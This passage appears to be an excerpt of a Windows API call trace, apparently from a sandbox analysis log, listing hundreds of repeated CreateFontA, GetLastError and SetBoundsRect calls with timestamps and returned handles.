cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x80a0722 [0037.363] GetLastError () returned 0x715 [0037.363] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.363] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x2c0a0151 [0037.363] GetLastError () returned 0x715 [0037.363] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.363] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x110a0274 [0037.363] GetLastError () returned 0x715 [0037.363] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.364] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x70a0720 [0037.364] GetLastError () returned 0x715 [0037.364] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.364] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xf0a07ec [0037.364] GetLastError () returned 0x715 [0037.364] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.364] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xa0a0712 [0037.364] GetLastError () returned 0x715 [0037.364] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.364] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x70a0721 [0037.364] GetLastError () returned 0x715 [0037.364] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.364] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x90a071f [0037.364] GetLastError () returned 0x715 [0037.364] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.364] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x140a070b [0037.364] GetLastError () returned 0x715 [0037.364] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.364] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xb0a0717 [0037.364] GetLastError () returned 0x715 [0037.364] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.364] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x90a0724 [0037.364] GetLastError () returned 0x715 [0037.364] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.364] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xc0a0723 [0037.364] GetLastError () returned 0x715 [0037.364] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.364] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x130a0727 [0037.364] GetLastError () returned 0x715 [0037.364] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.364] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x2f0a0841 [0037.364] GetLastError () returned 0x715 [0037.364] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.364] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xd0a0842 [0037.364] GetLastError () returned 0x715 [0037.365] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.365] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x80a083f [0037.365] GetLastError () returned 0x715 [0037.365] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.365] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x80a0836 [0037.365] GetLastError () returned 0x715 [0037.365] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.365] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x90a0835 [0037.365] GetLastError () returned 0x715 [0037.365] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.365] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x250a07e4 [0037.365] GetLastError () returned 0x715 [0037.365] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.365] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xc0a07ed [0037.365] GetLastError () returned 0x715 [0037.365] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.365] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x130a07ce [0037.365] GetLastError () returned 0x715 [0037.365] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.365] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xf0a07f8 [0037.365] GetLastError () returned 0x715 [0037.365] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.365] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xc0a07ea [0037.365] GetLastError () returned 0x715 [0037.365] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.365] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x90a07e9 [0037.365] GetLastError () returned 0x715 [0037.365] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.365] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x110a07e8 [0037.365] GetLastError () returned 0x715 [0037.365] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.365] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xa0a0224 [0037.365] GetLastError () returned 0x715 [0037.365] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.365] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x70a027e [0037.366] GetLastError () returned 0x715 [0037.366] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.366] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x80a0268 [0037.366] GetLastError () returned 0x715 [0037.366] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.366] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xa0a027d [0037.366] GetLastError () returned 0x715 [0037.366] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.366] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xc0a0820 [0037.366] GetLastError () returned 0x715 [0037.366] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.366] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x50a027a [0037.366] GetLastError () returned 0x715 [0037.366] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.366] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x30a0837 [0037.366] GetLastError () returned 0x715 [0037.366] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.366] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x20a0838 [0037.366] GetLastError () returned 0x715 [0037.366] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.366] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x30a0839 [0037.366] GetLastError () returned 0x715 [0037.366] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.366] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x80a082f [0037.366] GetLastError () returned 0x715 [0037.366] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.366] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x40a0831 [0037.366] GetLastError () returned 0x715 [0037.366] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.366] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x20a0834 [0037.366] GetLastError () returned 0x715 [0037.366] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.366] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x2f0a06ed [0037.366] GetLastError () returned 0x715 [0037.367] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.367] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x390a06e8 [0037.367] GetLastError () returned 0x715 [0037.367] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.367] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1e0a06e9 [0037.367] GetLastError () returned 0x715 [0037.367] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.367] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x20a084e [0037.367] GetLastError () returned 0x715 [0037.367] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.367] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1f0a0787 [0037.367] GetLastError () returned 0x715 [0037.367] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.367] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x50a0849 [0037.367] GetLastError () returned 0x715 [0037.367] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.367] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xb0a0845 [0037.367] GetLastError () returned 0x715 [0037.367] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.367] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1b0a06ee [0037.367] GetLastError () returned 0x715 [0037.367] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.367] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x40a084c [0037.367] GetLastError () returned 0x715 [0037.367] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.367] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x20a0833 [0037.367] GetLastError () returned 0x715 [0037.367] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.367] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x50a0832 [0037.367] GetLastError () returned 0x715 [0037.367] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.367] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x50a0830 [0037.367] GetLastError () returned 0x715 [0037.367] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.368] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x90a082e [0037.368] GetLastError () returned 0x715 [0037.368] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.368] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1a0a06ea [0037.368] GetLastError () returned 0x715 [0037.368] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.368] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x50a0855 [0037.368] GetLastError () returned 0x715 [0037.368] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.368] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x2f0a07ba [0037.368] GetLastError () returned 0x715 [0037.368] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.368] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x60a0863 [0037.368] GetLastError () returned 0x715 [0037.368] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.368] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x90a0858 [0037.368] GetLastError () returned 0x715 [0037.368] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.368] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x70a085b [0037.368] GetLastError () returned 0x715 [0037.368] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.368] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x40a085c [0037.368] GetLastError () returned 0x715 [0037.368] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.368] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x30a0864 [0037.368] GetLastError () returned 0x715 [0037.368] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.368] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x60a084a [0037.368] GetLastError () returned 0x715 [0037.368] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.368] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x60a085f [0037.368] GetLastError () returned 0x715 [0037.368] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.368] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x20a084b [0037.368] GetLastError () returned 0x715 [0037.369] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.369] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x30a0848 [0037.369] GetLastError () returned 0x715 [0037.369] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.369] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x30a0847 [0037.369] GetLastError () returned 0x715 [0037.369] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.369] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xf0a07ca [0037.369] GetLastError () returned 0x715 [0037.369] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.369] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xd0a0227 [0037.369] GetLastError () returned 0x715 [0037.369] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.369] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x1d0a0861 [0037.369] GetLastError () returned 0x715 [0037.369] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.369] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x80a085d [0037.369] GetLastError () returned 0x715 [0037.369] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.369] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x20a085e [0037.369] GetLastError () returned 0x715 [0037.369] SetBoundsRect 